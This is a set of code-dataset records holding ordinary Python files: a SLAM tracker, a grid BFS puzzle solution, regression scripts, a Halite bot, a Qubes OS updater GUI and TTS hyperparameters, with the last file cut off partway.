+{"seq_id":"619215589","text":"import sys\nimport os\nimport cv2\n\nfrom pysvso.py_pose_graph.mapblock import RuntimeBlock\nfrom pysvso.system_tracker.tracker import SVSOTracker, Tracker\nfrom pysvso.graphics.viewer import PCViewer\nfrom pysvso.validation_toolkit.tum import Program as GTReader\nfrom pysvso.py_parallel_tasking_sched.threadingpool import ThreadingPool\n\nfrom pysvso.lib.log import init_logging\nimport logging\n\ninit_logging()\n\nfrom pysvso.config import Settings\n\nsettings = Settings()\nprint(settings)\n\nProject_base = settings.PROJECT_ROOT\nCamera_device = settings.CAMERA_DEVICE\n\nclass System:\n\n def __init__(self):\n # construct a map block, where typically raw map data should be read from this point\n block = RuntimeBlock()\n self._block = block\n block.load_device(Camera_device)\n\n # initialize a tracker\n tracker = SVSOTracker().set_FromMap(block)\n self._tracker = tracker\n\n # reading ground truth\n # NOTE: modify \"global_settings.py\" to decide whether you want to use ground truth\n trajectories, timestamps, depth_images = GTReader()\n self._trajectories = trajectories\n self._timestamps = timestamps\n self._depth_images = depth_images\n\n # set ground truth we loaded before\n tracker.trajectories_gt = trajectories\n\n # set depth images\n tracker.depth_images = depth_images\n\n # viewer\n self._legacy_viewer = None\n\n self._viewer = PCViewer()\n viewer = self._viewer\n\n viewer.set_FromTracker(tracker)\n viewer.set_FromMap(block)\n # viewer.Init()\n # Pycharm has some problems to run this snippet of codes\n viewer.Start()\n print(\"[Main Thread] viewer: \", viewer)\n print(\"\\n\\n\")\n pass\n\n def run(self):\n tracker = self._tracker\n timestamps = self._timestamps\n viewer = self._viewer\n\n DRAW_ONCE = False\n\n # ORBSLAM2 first successfully triangulated frame no: #91\n\n SAVER = settings.SAVER\n if not os.path.isdir(SAVER):\n os.makedirs(SAVER)\n\n # allocating system resources\n pool = ThreadingPool(5)\n\n # pool.add_task(viewer.Start)\n\n # experiments controls\n cnt = 0 # total frames seq\n cnt0 = 0 # tracked frames seq\n\n START_FRAMES = 0\n STOP_FRAMES = 500\n TRACKED_FRAMES = 400\n\n STEP = 5\n\n P1 = START_FRAMES\n P2 = START_FRAMES + 3 * STEP # 3\n P3 = START_FRAMES + 50 * STEP # 50\n\n capture = cv2.VideoCapture(os.path.join(settings.VIDEO_DIR, settings.VIDEO_NAME))\n\n while True:\n ret, frame = capture.read()\n if not ret:\n break\n\n timestamp = float(timestamps[cnt][0])\n file_name = timestamps[cnt][1]\n\n cnt += 1\n if cnt % STEP != 1:\n # comment this line if you want track images continuously\n pass\n # continue\n\n if cnt < START_FRAMES:\n continue\n\n # Relocalization control\n if cnt > P2 and cnt < P3:\n # creating missing gaps\n logging.info(\"skiping seqences from %d to %d, cur %d\" % (\n P2, P3, cnt\n ))\n continue\n\n # Trigger relocalization mode\n if cnt == P3:\n logging.info(\"manually switch state\")\n tracker.state = Tracker.State.LOSTED\n DRAW_ONCE = False\n # store the legacy\n self._legacy_viewer = viewer\n # create a new viewer\n self._viewer = PCViewer()\n viewer = self._viewer\n viewer.set_FromTracker(tracker)\n viewer.set_FromMap(tracker._map)\n # viewer.Init()\n # Pycharm has some problems to run this snippet of codes\n viewer.Start()\n\n # the tracker is in relocalization mode and not initialized\n if tracker._is_relocalization_mode and not tracker.isInitialized():\n # I don't wan to use a new map here\n viewer.set_FromMap(tracker._map)\n pass\n\n # @todo : TODO fix encoding error\n logging.info(\"exec tracker to 
track motions: %d\" % cnt)\n # Hybrid of OpticalFlow and Kalman Filter predictor & deep features based Hungarian algorithm implementation, Updated on Feb 26 2020 by Author Lei Wang\n tracker.track(frame, timestamp=timestamp)\n cnt0 += 1\n\n if tracker.cur is None: # relocalization triggered!\n continue\n\n ### Deprecated codes, in favor of new implementation of WebImagaRenderer ###\n # offline task\n if tracker.cur is not None and (\n not hasattr(tracker.cur, \"rendered_img\") or tracker.cur.rendered_img is None):\n logging.info(\"skipping rendered_img at Frame#%d ...\" % tracker.cur.seq)\n continue\n\n if not tracker.cur.is_First and tracker.cur.isKeyFrame:\n if tracker.cur.depth_img is not None and not DRAW_ONCE:\n viewer.drawDepthImage(tracker.cur)\n DRAW_ONCE = True\n logging.info(\"Scheduling task of updating point cloud viewer at KeyFrame %s\" % tracker.cur)\n\n def update_map(cv, cur=None, last=None, flow_mask=None, active_frames=None):\n with cv:\n logging.info(\"Waiting for completion of updating map ...\")\n cv.wait_for(\n lambda: tracker._map.complete_updating) # awaken by local mapper, and check complete_updating variable\n logging.info(\"Updating ...\")\n viewer.Update(cur=cur, last=last, flow_mask=flow_mask, active_frames=active_frames)\n logging.info(\"Point cloud viewer updated at KeyFrame %s\" % tracker.cur)\n tracker._map.complete_updating = False\n\n if not pool.tasks.full():\n pool.add_task(update_map, tracker._map.update_map_condition,\n cur=tracker.cur, last=tracker.last_frame, flow_mask=tracker.flow_mask,\n active_frames=tracker._map.get_active_frames())\n else:\n logging.info(\"Tasks are full. Cannot push tasks into the pool.\")\n\n if not tracker.cur.is_First and not tracker.cur.isKeyFrame:\n # update pose\n viewer.Update()\n pass\n\n # rets = model.detect([tracker.last_frame.img], verbose=1)\n # r = rets[0]\n # visualize.display_instances(frame, r['rois'], r['masks'], r['class_ids'], class_names, r['scores'])\n # out_frame = save_instances(tracker.last_frame.img, r['rois'], r['masks'], r['class_ids'], class_names, r['scores'])\n\n name = os.path.join(settings.SAVER, \"images/{}.jpg\".format(cnt))\n if tracker.last_frame is None or not hasattr(tracker.last_frame,\n \"rendered_img\") or tracker.last_frame.rendered_img is None:\n out_frame = tracker.cur.rendered_img\n else:\n out_frame = cv2.add(tracker.last_frame.rendered_img, tracker.flow_mask)\n cv2.imwrite(name, out_frame)\n\n if cnt >= STOP_FRAMES:\n logging.info(\"break after %d frames\" % STOP_FRAMES)\n break\n\n if cnt0 >= TRACKED_FRAMES:\n logging.info(\"break after %d frames tracked\" % TRACKED_FRAMES)\n break\n\n if tracker.isInitialized():\n continue\n\n logging.info(\"complete reading video.\")\n capture.release()\n # viewer.Stop()\n pass\n\n\nif __name__ == \"__main__\":\n system = System()\n system.run()","sub_path":"python/pysvso/system_tracker/system.py","file_name":"system.py","file_ext":"py","file_size_in_byte":7968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"154882531","text":"from collections import deque\n\n# 변수 선언 및 입력\nn, L, R = tuple(map(int, input().split()))\n\negg = [\n list(map(int, input().split()))\n for _ in range(n)\n]\n\nbfs_q = deque()\negg_group = []\nvisited = [\n [False for _ in range(n)]\n for _ in range(n)\n]\n\n\ndef in_range(x, y):\n return 0 <= x and x < n and 0 <= y and y < n\n\n\ndef can_go(x, y, curr_egg):\n if not in_range(x, y):\n return False\n\n egg_diff = abs(egg[x][y] - curr_egg)\n return not visited[x][y] \\\n and L <= egg_diff and egg_diff <= R\n\n\n# visited 배열을 초기화 해줍니다.\ndef initialize_visited():\n for i in range(n):\n for j in range(n):\n visited[i][j] = False\n\n\ndef bfs():\n dxs, dys = [0, 1, 0, -1], [1, 0, -1, 0]\n\n # BFS 탐색을 수행합니다.\n while bfs_q:\n curr_x, curr_y = bfs_q.popleft()\n\n for dx, dy in zip(dxs, dys):\n new_x, new_y = curr_x + dx, curr_y + dy\n\n # L, R 사이인 경우에만 합쳐질 수 있습니다.\n if can_go(new_x, new_y, egg[curr_x][curr_y]):\n bfs_q.append((new_x, new_y))\n egg_group.append((new_x, new_y))\n visited[new_x][new_y] = True\n\n\n# 계란들을 합칩니다.\ndef merge_eggs():\n sum_of_eggs = sum([\n egg[x][y]\n for x, y in egg_group\n ])\n\n for x, y in egg_group:\n egg[x][y] = sum_of_eggs // len(egg_group)\n\n\n# 조건에 맞게 계란의 양을 바꿔줍니다.\ndef move_eggs():\n global egg_group\n\n # BFS 탐색을 위한 초기화 작업을 수행합니다.\n initialize_visited()\n\n is_changed = False\n\n # 아직 방문하지 못한 칸에 대해\n # BFS 탐색을 통해 합쳐질 계란들을 찾아냅니다.\n for i in range(n):\n for j in range(n):\n if not visited[i][j]:\n # 합쳐질 계란 목록을 담을 곳을 초기화합니다.\n egg_group = []\n\n bfs_q.append((i, j))\n egg_group.append((i, j))\n visited[i][j] = True\n\n bfs()\n\n # 계란의 이동이 한번이라도 일어났는지를 확인합니다.\n if len(egg_group) > 1:\n is_changed = True\n\n # (i, j)와 관련이 있는 계란들을 합칩니다.\n merge_eggs()\n\n return is_changed\n\n\nmove_cnt = 0\n\n# 이동이 더 이상 필요 없을 때까지\n# 계란의 이동을 반복합니다.\nwhile True:\n is_changed = move_eggs()\n if not is_changed:\n break\n\n move_cnt += 1\n\nprint(move_cnt)\n","sub_path":"samsung/11/17 토스트 계란틀/33.py","file_name":"33.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"640850017","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 29 23:50:57 2021\n\n@author: Aditya Mishra\n\"\"\"\n\n# Necessary Libraries\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import load_diabetes\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression as Sk_linear_reg\nfrom sklearn.metrics import mean_squared_error\nfrom my_linear_model import LinearRegression\n\n# Dataset\ndata = load_diabetes()\ndf = pd.DataFrame(data.data, columns=data.feature_names)\ndf['target'] = data.target\nprint('Describe Dataset\\n', df.describe())\n\n# Model\nepoch = 10_000\nmy_clf = LinearRegression(max_iter=epoch, optimizer='bgd')\nreg_clf = Sk_linear_reg()\n\nx_train, x_test, y_train, y_test = train_test_split(df.drop(['target'], axis=1), df['target'], test_size=0.3)\nmy_clf.fit(x_train, y_train)\nreg_clf.fit(x_train, y_train)\n\nmy_pred = my_clf.predict(x_test)\nreg_pred = reg_clf.predict(x_test)\n\n# Model Test Result\nprint(f\"My Model's MSE: {my_clf.mse(y_test, my_pred):.3f}\")\nprint(f\"Sklearn Model's MSE: {mean_squared_error(y_test, reg_pred):.3f}\")\n\n# Error Plot\nplt.title(\"Error in K-epochs\")\nplt.plot(range(epoch), my_clf.error_, 'r-')\nplt.xlabel('Epochs')\nplt.ylabel('Error')\nplt.show()\n","sub_path":"driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"148001241","text":"import hlt\nimport logging\nfrom time import time\n\n#SETUP\n\nclass Bot:\n def __init__(self, entity, my_id, myShips):\n self.ship = entity\n \n self.playerID = my_id\n self.teamShips = myShips\n \n def findNearbyEntities(self, gameMap):\n self.entitiesDistance = gameMap.nearby_entities_by_distance(self.ship)\n \n def sortNearbyEntities(self):\n self.planetsOfInterest = []\n self.closestShip = None\n tempSortedEntities = sorted(self.entitiesDistance)\n found = False\n for distance in tempSortedEntities:\n entity = self.entitiesDistance[distance][0]\n if self.isPlanet(entity, self.playerID):\n \n self.planetsOfInterest.append((entity, distance)) \n if self.isShip(entity, self.playerID, self.teamShips) and not found:\n found = True\n self.closestShip = (entity, distance)\n\n def getPriorities(self, gameMap):\n self.findNearbyEntities(gameMap)\n self.sortNearbyEntities()\n self.priorities = self.planetsOfInterest\n self.priorities.append(self.closestShip)\n if self.closestShip[1] < 25:\n self.priorities.reverse()\n return self.priorities\n\n\n def isPlanet(self, entity, myID):\n if isinstance(entity, hlt.entity.Planet):\n return (not entity.is_owned() or (entity.owner.id == myID and not entity.is_full()))\n return False\n \n def isShip(self,entity, myID, teamShips):\n return isinstance(entity, hlt.entity.Ship) and not entity in teamShips\n\nclass BotController:\n def __init__(self):\n self.game = hlt.Game(\"Settler\")\n\n self.command_queue = []\n \n def update(self):\n self.start = time()\n self.gameMap = self.game.update_map()\n self.myID = self.gameMap.my_id\n self.myBots = []\n self.command_queue = []\n \n def getShips(self):\n myShips = []\n \n for ship in self.gameMap.get_me().all_ships():\n myShips.append(ship)\n\n return myShips\n\n def createBots(self):\n ships = self.getShips()\n self.myBots = []\n for bot in ships:\n self.myBots.append(Bot(bot,self.myID,ships))\n\n def getBotPriorities(self):\n botPriorities = {}\n for bot in self.myBots:\n botPriorities[bot.ship] = bot.getPriorities(self.gameMap)\n return self.sortBotPriorities(botPriorities)\n\n def sortBotPriorities(self, botPriorities):\n tempBotPriorities = sorted(botPriorities, key = lambda bot:botPriorities[bot][0][1])\n finalBotPriorities = {}\n for bot in tempBotPriorities:\n finalBotPriorities[bot] = botPriorities[bot]\n return finalBotPriorities\n\n def getPlanetSpaces(self):\n planetSpaces = {}\n for planet in self.gameMap.all_planets():\n planetSpaces[planet] = planet.num_docking_spots-len(planet._docked_ship_ids)\n return planetSpaces\n\n def getCommands(self): \n priorities = self.getBotPriorities()\n planetSpaces = self.getPlanetSpaces()\n for bot in priorities:\n if bot.docking_status != bot.DockingStatus.UNDOCKED:\n continue\n navigateCommand = None\n for preference in priorities[bot]:\n target = preference[0]\n if self.isPlanet(target):\n if bot.can_dock(target):\n planetSpaces[target] -= 1\n navigateCommand = bot.dock(target)\n break\n if planetSpaces[target] > 0:\n planetSpaces[target] -= 1\n navigateCommand = bot.navigate(\n bot.closest_point_to(target),\n self.gameMap,\n speed=int(hlt.constants.MAX_SPEED),\n ignore_ships=False)\n break\n else:\n #Attack Ship Code\n navigateCommand = bot.navigate(\n bot.closest_point_to(target),\n self.gameMap,\n speed=int(hlt.constants.MAX_SPEED),\n ignore_ships=False)\n break\n if navigateCommand:\n self.command_queue.append(navigateCommand)\n \n def sendCommands(self):\n logging.info(self.start-time())\n 
self.game.send_command_queue(self.command_queue)\n \n\n def isPlanet(self,entity):\n return isinstance(entity, hlt.entity.Planet)\n\n#START GAME\nController = BotController()\n\nlogging.info(\"Initialising Robbot...\")\n\n\nwhile True:\n Controller.update()\n Controller.createBots()\n Controller.getCommands()\n Controller.sendCommands()\n \n \n \n \n","sub_path":"MyBot-v8.py","file_name":"MyBot-v8.py","file_ext":"py","file_size_in_byte":4928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"552093519","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# pylint: disable=wrong-import-position,import-error\n\nimport re\nimport time\nimport threading\nimport subprocess\nimport pkg_resources\nimport gi # isort:skip\ngi.require_version('Gtk', '3.0') # isort:skip\nfrom gi.repository import Gtk, Gdk, GObject, Gio # isort:skip\nfrom qubesadmin import Qubes\nfrom qubesadmin import exc\n\n# using locale.gettext is necessary for Gtk.Builder translation support to work\n# in most cases gettext is better, but it cannot handle Gtk.Builder/glade files\nimport locale\nfrom locale import gettext as _\nlocale.bindtextdomain(\"desktop-linux-manager\", \"/usr/locales/\")\nlocale.textdomain('desktop-linux-manager')\n\nclass QubesUpdater(Gtk.Application):\n # pylint: disable=too-many-instance-attributes\n\n def __init__(self, qapp):\n super().__init__(\n application_id=\"org.gnome.example\",\n flags=Gio.ApplicationFlags.FLAGS_NONE)\n\n self.qapp = qapp\n\n self.primary = False\n self.connect(\"activate\", self.do_activate)\n\n def perform_setup(self, *_args, **_kwargs):\n # pylint: disable=attribute-defined-outside-init\n self.builder = Gtk.Builder()\n self.builder.set_translation_domain(\"desktop-linux-manager\")\n self.builder.add_from_file(pkg_resources.resource_filename(\n __name__, 'updater.glade'))\n\n self.main_window = self.builder.get_object(\"main_window\")\n\n self.vm_list = self.builder.get_object(\"vm_list\")\n\n self.updates_available = self.populate_vm_list()\n\n self.no_updates_available_label = \\\n self.builder.get_object(\"no_updates_available\")\n self.no_updates_available_label.set_visible(not self.updates_available)\n\n self.allow_update_unavailable_check = \\\n self.builder.get_object(\"allow_update_unavailable\")\n self.allow_update_unavailable_check.connect(\"clicked\",\n self.set_update_available)\n\n self.next_button = self.builder.get_object(\"button_next\")\n self.next_button.connect(\"clicked\", self.next_clicked)\n\n self.cancel_button = self.builder.get_object(\"button_cancel\")\n self.cancel_button.connect(\"clicked\", self.cancel_updates)\n self.main_window.connect(\"delete-event\", self.window_close)\n self.main_window.connect(\"key-press-event\", self.check_escape)\n\n self.stack = self.builder.get_object(\"main_stack\")\n self.list_page = self.builder.get_object(\"list_page\")\n self.progress_page = self.builder.get_object(\"progress_page\")\n self.finish_page = self.builder.get_object(\"finish_page\")\n self.progress_textview = self.builder.get_object(\"progress_textview\")\n self.progress_scrolled_window = self.builder.get_object(\n \"progress_scrolled_window\")\n self.progress_listview = self.builder.get_object(\"progress_listview\")\n\n self.details_visible = True\n self.details_icon = self.builder.get_object(\"details_icon\")\n self.builder.get_object(\"details_icon_events\").connect(\n \"button-press-event\", self.toggle_details)\n self.builder.get_object(\"details_label\").connect(\n \"clicked\", self.toggle_details)\n\n self.load_css()\n\n self.main_window.show_all()\n self.toggle_details()\n\n self.update_thread = None\n self.exit_triggered = False\n\n def do_activate(self, *_args, **_kwargs):\n if not self.primary:\n self.perform_setup()\n self.primary = True\n self.hold()\n else:\n self.main_window.present()\n\n @staticmethod\n def load_css():\n style_provider = Gtk.CssProvider()\n css = b'''\n .black-border { \n border-width: 1px; \n border-color: #c6c6c6; \n border-style: solid;\n }\n '''\n style_provider.load_from_data(css)\n\n 
Gtk.StyleContext.add_provider_for_screen(\n Gdk.Screen.get_default(),\n style_provider,\n Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION)\n\n def populate_vm_list(self):\n result = False # whether at least one VM has updates available\n for vm in self.qapp.domains:\n if vm.klass == 'AdminVM':\n try:\n state = vm.features.get('updates-available', False)\n except exc.QubesDaemonCommunicationError:\n state = False\n result = result or state\n self.vm_list.add(VMListBoxRow(vm, state))\n\n for vm in self.qapp.domains:\n if getattr(vm, 'updateable', False) and vm.klass != 'AdminVM':\n try:\n state = vm.features.get('updates-available', False)\n except exc.QubesDaemonCommunicationError:\n state = False\n result = result or state\n vmrow = VMListBoxRow(vm, state)\n self.vm_list.add(vmrow)\n vmrow.checkbox.connect('toggled', self.checkbox_checked)\n\n self.vm_list.connect(\"row-activated\", self.toggle_row_selection)\n return result\n\n def checkbox_checked(self, _emitter, *_args):\n for vm_row in self.vm_list:\n if vm_row.checkbox.get_active():\n self.next_button.set_sensitive(True)\n return\n self.next_button.set_sensitive(False)\n\n @staticmethod\n def toggle_row_selection(_emitter, row):\n if row:\n row.checkbox.set_active(not row.checkbox.get_active())\n row.set_label_text()\n\n def set_update_available(self, _emitter):\n for vm_row in self.vm_list:\n if not vm_row.updates_available:\n vm_row.set_sensitive(\n self.allow_update_unavailable_check.get_active())\n if not vm_row.get_sensitive():\n vm_row.checkbox.set_active(False)\n\n def next_clicked(self, _emitter):\n if self.stack.get_visible_child() == self.list_page:\n self.stack.set_visible_child(self.progress_page)\n\n for row in self.vm_list:\n if row.checkbox.get_active():\n self.progress_listview.add(ProgressListBoxRow(row.vm))\n\n self.progress_listview.show_all()\n\n self.next_button.set_sensitive(False)\n self.next_button.set_label(_(\"_Finish\"))\n\n # pylint: disable=attribute-defined-outside-init\n self.update_thread = threading.Thread(target=self.perform_update)\n self.update_thread.start()\n\n elif self.stack.get_visible_child() == self.progress_page:\n self.cancel_updates()\n return\n\n def toggle_details(self, *_args, **_kwargs):\n # pylint: disable=attribute-defined-outside-init\n self.details_visible = not self.details_visible\n self.progress_textview.set_visible(self.details_visible)\n\n if self.details_visible:\n self.progress_textview.show()\n self.progress_scrolled_window.show()\n else:\n self.progress_textview.hide()\n self.progress_scrolled_window.hide()\n\n if self.details_visible:\n self.details_icon.set_from_icon_name(\"pan-down-symbolic\",\n Gtk.IconSize.BUTTON)\n else:\n self.details_icon.set_from_icon_name(\"pan-end-symbolic\",\n Gtk.IconSize.BUTTON)\n\n def append_text_view(self, text):\n buffer = self.progress_textview.get_buffer()\n buffer.insert(buffer.get_end_iter(), text + '\\n')\n\n def perform_update(self):\n for row in self.progress_listview:\n if self.exit_triggered:\n GObject.idle_add(row.set_status, 'failure')\n GObject.idle_add(\n self.append_text_view,\n _(\"Canceled update for {}\\n\").format(row.vm.name))\n continue\n\n GObject.idle_add(\n self.append_text_view, _(\"Updating {}\\n\").format(row.vm.name))\n GObject.idle_add(row.set_status, 'in-progress')\n\n try:\n if row.vm.klass == 'AdminVM':\n output = subprocess.check_output(\n ['sudo', 'qubesctl', '--dom0-only', '--no-color',\n 'pkg.upgrade', 'refresh=True'],\n stderr=subprocess.STDOUT).decode()\n ansi_escape = re.compile(r'(\\x9B|\\x1B\\[)[0-?]*[ 
-/]*[@-~]')\n output = ansi_escape.sub('', output)\n else:\n output = subprocess.check_output(\n ['sudo', 'qubesctl', '--skip-dom0',\n '--targets=' + row.vm.name, '--show-output',\n 'state.sls', 'update.qubes-vm'],\n stderr=subprocess.STDOUT).decode()\n\n GObject.idle_add(self.append_text_view, output)\n GObject.idle_add(row.set_status, 'success')\n\n except subprocess.CalledProcessError as ex:\n GObject.idle_add(\n self.append_text_view,\n _(\"Error on updating {}: {}\\n{}\").format(\n row.vm.name, str(ex), ex.output.decode()))\n GObject.idle_add(row.set_status, 'failure')\n\n GObject.idle_add(self.next_button.set_sensitive, True)\n GObject.idle_add(self.cancel_button.set_visible, False)\n\n def cancel_updates(self, *_args, **_kwargs):\n # pylint: disable=attribute-defined-outside-init\n if self.update_thread and self.update_thread.is_alive():\n self.exit_triggered = True\n dialog = Gtk.MessageDialog(\n self.main_window, Gtk.DialogFlags.MODAL, Gtk.MessageType.OTHER,\n Gtk.ButtonsType.NONE, _(\n \"Waiting for current qube to finish updating.\"\n \" Updates for remaining qubes have been cancelled.\"))\n dialog.show()\n while self.update_thread.is_alive():\n while Gtk.events_pending():\n Gtk.main_iteration()\n time.sleep(1)\n dialog.hide()\n else:\n self.exit_updater()\n\n def check_escape(self, _widget, event, _data=None):\n if event.keyval == Gdk.KEY_Escape:\n self.cancel_updates()\n\n def window_close(self, *_args, **_kwargs):\n if self.stack.get_visible_child() == self.progress_page:\n self.cancel_updates()\n self.exit_updater()\n\n def exit_updater(self, _emitter=None):\n if self.primary:\n self.release()\n\n\ndef get_domain_icon(vm):\n icon_vm = Gtk.IconTheme.get_default().load_icon(vm.label.icon, 16, 0)\n icon_img = Gtk.Image.new_from_pixbuf(icon_vm)\n return icon_img\n\n\nclass VMListBoxRow(Gtk.ListBoxRow):\n def __init__(self, vm, updates_available, **properties):\n super().__init__(**properties)\n self.vm = vm\n\n hbox = Gtk.HBox(orientation=Gtk.Orientation.HORIZONTAL)\n\n self.label_text = vm.name\n self.updates_available = updates_available\n if self.updates_available:\n self.label_text = _(\"{vm} (updates available)\").format(\n vm=self.label_text)\n self.label = Gtk.Label()\n self.icon = get_domain_icon(self.vm)\n\n self.checkbox = Gtk.CheckButton()\n self.checkbox.set_active(self.updates_available)\n self.checkbox.set_margin_right(10)\n\n self.checkbox.connect(\"clicked\", self.set_label_text)\n self.set_sensitive(self.updates_available)\n\n self.set_label_text()\n\n hbox.pack_start(self.checkbox, False, False, 0)\n hbox.pack_start(self.icon, False, False, 0)\n hbox.pack_start(self.label, False, False, 0)\n\n # check for VMs that may be restored from older Qubes versions\n # and not support updating; this is a heuristic and may not always work\n try:\n if vm.features.get('qrexec', False) and \\\n vm.features.get('gui', False) and \\\n not vm.features.get('os', False):\n warn_icon = Gtk.Image.new_from_pixbuf(\n Gtk.IconTheme.get_default().load_icon(\n 'dialog-warning', 12, 0))\n warn_icon.set_tooltip_text(\n 'This qube may have been restored from an older version of '\n 'Qubes OS and may not be able to update itself correctly. 
'\n 'Please check the documentation if problems occur.')\n hbox.pack_start(warn_icon, False, False, 0)\n except exc.QubesDaemonCommunicationError:\n # we have no permission to access the vm's features, there's no\n # point in guessing original Qubes version\n pass\n\n self.add(hbox)\n\n def set_label_text(self, _=None):\n if self.checkbox.get_active():\n self.label.set_markup(\"{} \".format(self.label_text))\n else:\n self.label.set_markup(self.label_text)\n\n\nclass ProgressListBoxRow(Gtk.ListBoxRow):\n def __init__(self, vm):\n super().__init__()\n\n self.vm = vm\n\n hbox = Gtk.HBox(orientation=Gtk.Orientation.HORIZONTAL)\n\n self.icon = get_domain_icon(self.vm)\n self.icon.set_margin_right(10)\n\n self.label = Gtk.Label(vm.name)\n self.label.set_margin_right(10)\n\n self.progress_box = Gtk.HBox(orientation=Gtk.Orientation.HORIZONTAL)\n\n hbox.pack_start(self.icon, False, False, 0)\n hbox.pack_start(self.label, False, False, 0)\n hbox.pack_start(self.progress_box, False, False, 0)\n\n self.set_status('not-started')\n self.add(hbox)\n\n def set_status(self, status):\n\n if status == 'not-started':\n widget = Gtk.Spinner()\n elif status == 'in-progress':\n widget = Gtk.Spinner()\n widget.start()\n elif status == 'success':\n widget = Gtk.Image.new_from_icon_name(\"gtk-apply\",\n Gtk.IconSize.BUTTON)\n elif status == 'failure':\n widget = Gtk.Image.new_from_icon_name(\"gtk-cancel\",\n Gtk.IconSize.BUTTON)\n else:\n raise ValueError(_(\"Unknown status {}\").format(status))\n\n for child in self.progress_box.get_children():\n self.progress_box.remove(child)\n\n self.progress_box.pack_start(widget, False, False, 0)\n\n widget.show()\n\n\ndef main():\n qapp = Qubes()\n app = QubesUpdater(qapp)\n app.run()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"qui/updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":14654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
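perform_update() touches widgets from its worker thread only through GObject.idle_add, which queues the call onto the GTK main loop (only that thread may mutate widgets). The handoff reduced to its core, as a sketch rather than the updater's actual flow:

import threading
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk, GObject

label = Gtk.Label(label='working...')

def worker():
    # ... long-running work happens here, off the main loop ...
    GObject.idle_add(label.set_text, 'done')  # marshalled back to the GTK thread

threading.Thread(target=worker, daemon=True).start()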
+{"seq_id":"242501617","text":"import tensorflow as tf\n\nhparams = tf.contrib.training.HParams(\n num_mels=80,\n frame_length_ms=50,\n frame_shift_ms=12.5,\n hop_length=int(16000 * 0.0125), # samples.\n win_length=int(16000 * 0.05), # samples.\n max_db=100,\n ref_db=20,\n preemphasis=0.97,\n max_abs_value=4.0,\n symmetric_mel=True,\n sr=16000,\n n_fft=2048,\n\n n_iter=60,\n power=1.5,\n max_generation_frames=1300,\n max_eval_batches=20,\n max_eval_sample_length=1300,\n eval_sample_per_speaker=4,\n\n vocab_size=40000,\n embed_size=512,\n encoder_hidden=512,\n decoder_hidden=640,\n n_encoder_layer=5,\n n_decoder_layer=4,\n n_attention_head=8,\n transformer_dropout_rate=0.1,\n decoder_dropout_rate=0.5,\n prenet_hidden=256,\n postnet_hidden=512,\n n_postnet_layer=5,\n\n use_knowledge_attention=True,\n knowledge_value_size=2048,\n knowledge_key_size=1024,\n knowledge_start_layer=1,\n knowledge_end_layer=5,\n knowledge_attention_head=4,\n use_key_encoder=False,\n key_encode_layers=1,\n use_identical_key_context=False,\n\n token_dropout_rate=0.0,\n\n data_format=\"nltpi\",\n input_method=\"char\",\n use_sos=True,\n remove_space=False,\n bucket_size=512,\n shuffle_training_data=True,\n batch_frame_limit=8000,\n batch_frame_quad_limit=8000000,\n max_batch_size=32,\n balanced_training=False,\n lg_prob_scale=0.2,\n adapt_start_step=30000,\n adapt_end_step=30000,\n final_adapt_rate=0.25,\n data_warmup_steps=30000,\n target_length_lower_bound=240,\n target_length_upper_bound=800,\n\n reg_weight=5e-9,\n\n multi_speaker=True,\n max_num_speaker=1000,\n speaker_embedding_size=128,\n\n multi_lingual=False,\n max_num_language=100,\n language_net_hidden=128,\n language_embedding_size=128,\n front_lang_embed=True,\n\n warmup_steps=50000,\n max_lr=1e-3,\n min_lr=1e-5,\n lr_decay_step=550000,\n lr_decay_rate=1e-2,\n adam_eps=5e-8,\n\n external_embed_dim=1024,\n use_external_embed=True,\n)\n","sub_path":"hyperparams.py","file_name":"hyperparams.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"580994407","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\n\n\ndef load_file(filename, names):\n return pd.read_csv(filename, header=None, names=names)\n\n\ndf = load_file('ex2data1.txt', ['first_exam', 'second_exam', 'accepted'])\nX_train, y_train = df.filter(['first_exam', 'second_exam']), df['accepted']\n\n\nz_true = df[df['accepted'] == 1]\nz_false = df[df['accepted'] == 0]\nfig, ax = plt.subplots()\nax.scatter(z_true['first_exam'], z_true['second_exam'], marker='o', c='g', label='Accepted', s=20)\nax.scatter(z_false['first_exam'], z_false['second_exam'], marker='x', c='r', label='Not accepted', s=20)\nax.legend(loc='upper right');\nax.set_xlabel('First exam')\nax.set_ylabel('Second exam')\nplt.show()\n\n\nfrom utils import sigmoid\n\nclass LogisticRegression:\n THRESHOLD = 1e-6\n\n def __init__(self, fit_method='gradient_descent', max_steps=100000,\n learning_rate=0.01, regularized=False, reg_L=0.5, log=False):\n self.weights = []\n self.max_steps = max_steps\n self.learning_rate = learning_rate\n self.regularized = regularized\n self.reg_L = reg_L\n self.cost_func = self.cost_func_regularized if regularized else self.cost_func_non_regularized\n self.cost_der = self.cost_der_regularized if regularized else self.cost_der_non_regularized\n self.fit_method = getattr(self, fit_method)\n self.log = log\n \n def fit(self, X, y):\n if hasattr(X, 'values'):\n X = X.values\n if hasattr(y, 'values'):\n y = y.values\n\n X = X.astype('float64') \n y = y.astype('float64')\n \n if not self.regularized:\n X = np.column_stack((np.ones(X.shape[0]), X))\n \n self.fit_method(X, y)\n \n def predict(self, X):\n if self.weights is None:\n raise Exception(\"Model is not trained. Call `fit` method.\")\n\n X = np.array(X)\n if not self.regularized:\n X = np.insert(X, 0, 1)\n h = self.calculate_hypotesis(X)\n 